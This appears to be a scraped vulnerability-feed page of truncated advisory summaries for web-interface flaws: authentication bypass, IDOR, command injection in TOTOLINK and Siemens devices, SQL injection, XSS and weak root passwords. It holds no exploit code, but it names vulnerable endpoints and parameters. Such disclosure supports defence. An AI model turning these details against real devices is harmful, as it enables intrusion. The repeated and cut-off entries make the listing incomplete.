EUVD-2025-203769

In limited scenarios, sensitive data might be written to the log file if an admin uses Microsoft Teams Admin Center TAC to make device configuration changes. The affected log file is visible only to users with admin credentials. This is limited to Microsoft TAC and does not affect configuration...

CVE-2025-67715 Weblate has Systematic User and Project Enumeration via Broken Authorization in REST API (IDOR)

Weblate is a web based localization tool. In versions prior to 5.15, it was possible to retrieve user notification settings or list all users via API. Version 5.15 fixes the issue...

CVE-2025-36754

The authentication mechanism on web interface is not properly implemented. It is possible to bypass authentication checks by crafting a post request with new settings since there is no session token or authentication in place. This would allow an attacker for instance to point the device to an...

EUVD-2025-203252

The authentication mechanism on web interface is not properly implemented. It is possible to bypass authentication checks by crafting a post request with new settings since there is no session token or authentication in place. This would allow an attacker for instance to point the device to an...

CVE-2025-36754

The authentication mechanism on web interface is not properly implemented. It is possible to bypass authentication checks by crafting a post request with new settings since there is no session token or authentication in place. This would allow an attacker for instance to point the device to an...

CVE-2025-14586

A vulnerability was determined in TOTOLINK X5000R 9.1.0cu.2089B20211224. Affected by this issue is the function snprintf of the file /cgi-bin/cstecgi.cgi?action=exportOvpn&type=user. This manipulation of the argument User causes os command injection. Remote exploitation of the attack is possible...

CVE-2025-36754 Authentication bypass on web interface

The authentication mechanism on web interface is not properly implemented. It is possible to bypass authentication checks by crafting a post request with new settings since there is no session token or authentication in place. This would allow an attacker for instance to point the device to an...

CVE-2025-36754 Authentication bypass on web interface

The authentication mechanism on web interface is not properly implemented. It is possible to bypass authentication checks by crafting a post request with new settings since there is no session token or authentication in place. This would allow an attacker for instance to point the device to an...

CVE-2025-36754

Technical details (affected product/versions, root cause, exploit specifics) are not publicly provided in the connected documents. Monitor for updates.

PT-2025-51103

The authentication mechanism on web interface is not properly implemented. It is possible to bypass authentication checks by crafting a post request with new settings since there is no session token or authentication in place. This would allow an attacker for instance to point the device to an...

Unraid Web Interface Detection

Binary data unraidwebdetect.nbin...

CVE-2025-66473

XWiki is an open-source wiki software platform. Versions 16.10.10 and below, 17.0.0-rc-1 through 17.4.3 and 17.5.0-rc-1 through 17.6.0 contain a REST API which doesn't enforce any limits for the number of items that can be requested in a single request at the moment. Depending on the number of...

CVE-2025-41692

A high privileged remote attacker with admin privileges for the webUI can brute-force the "root" and "user" passwords of the underlying OS due to a weak password generation algorithm...

FreePBX SQL Injection Vulnerability (CNVD-2025-3038208)

FreePBX formerly known as Asterisk Management Portal is a set of tools from the FreePBX project for configuring Asterisk IP telephony system through a GUI web-based graphical interface. FreePBX suffers from a SQL injection vulnerability that stems from a lack of validation of externally entered S...

CVE-2025-65231

Barix Instreamer v04.06 and earlier is vulnerable to Cross Site Scripting XSS in the Web UI I/O & Serial configuration page, specifically the CTS close command user-input field which is stored and later rendered on the Status page...

CVE-2025-41692 Weak/Predictable root Password

A high privileged remote attacker with admin privileges for the webUI can brute-force the "root" and "user" passwords of the underlying OS due to a weak password generation algorithm...

CVE-2025-41692

CVE-2025-41692 describes a high-privilege remote attack against a webUI where an admin user can brute-force the underlying OS root and user passwords due to a weak password generation algorithm. Connected sources (Red Hat and NVD/NVD-derived entries) indicate potential downstream risks: separate ...

Siemens SIMATIC CN 4100 命令注入漏洞

The Siemens SIMATIC CN 4100 is a communication node from Siemens, Germany. The Siemens SIMATIC CN 4100 suffers from a command injection vulnerability that stems from insufficient validation of REST API input parameters, which can be exploited by an attacker to cause execution of arbitrary code...

PT-2025-49811

A high privileged remote attacker with admin privileges for the webUI can brute-force the "root" and "user" passwords of the underlying OS due to a weak password generation algorithm...

EUVD-2025-201805

Barix Instreamer v04.06 and earlier is vulnerable to Cross Site Scripting XSS in the Web UI I/O & Serial configuration page, specifically the CTS close command user-input field which is stored and later rendered on the Status page...